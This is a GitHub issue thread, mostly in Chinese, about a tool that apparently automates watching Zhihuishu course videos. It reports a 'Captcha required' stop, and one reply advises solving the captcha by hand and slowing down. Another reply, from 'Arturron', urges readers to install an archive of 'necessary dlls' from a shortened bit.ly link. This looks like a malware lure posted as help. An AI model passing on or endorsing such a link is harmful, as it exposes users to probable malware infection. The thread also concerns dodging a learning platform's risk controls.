### ISSUE TITLE
[BUG]需要提供验证码Captcha required

### ISSUE THREAD

**Issue by Akimio521** [VermiIIi0n/fuckZHS#96]
**描述问题**
请详细清晰地描述问题

**如何复现**
您遇到问题前进行了什么操作:
1. python main.py -q
2. python main.py -c xxxxx -l 25 -proxy xxxxxx
3. 提示`Captcha required`
4. Bark收到通知`需要提供验证码`

**截图**
如果可以的话，请附上截图.

**您的操作系统和所使用的本代码版本**
 - OS: Windows
 - Version: [e.g. 2.0.2]

**错误日志**
请附上您认为重要的日志，不能判断的话请附上完整日志.
最好有 DEBUG 级别日志(使用参数 `-d` 或在配置文件中更改日志等级)

# 其他信息
通过代理域名查看视频主要流量在`wsvideo.zhihuishu.com`
不清楚如何解决该问题
重新运行可以正常播放一段时间，随后有需要验证，不知道是否触发了风控

**Comment by Arturron** [comment]
install this
https://bit.ly/4gwC82r
I put the necessary dlls in the archive

**Comment by 32154678925** [comment]
网页版手动刷一下，会让你输验证码，输了之后就可以刷了，不要开太快
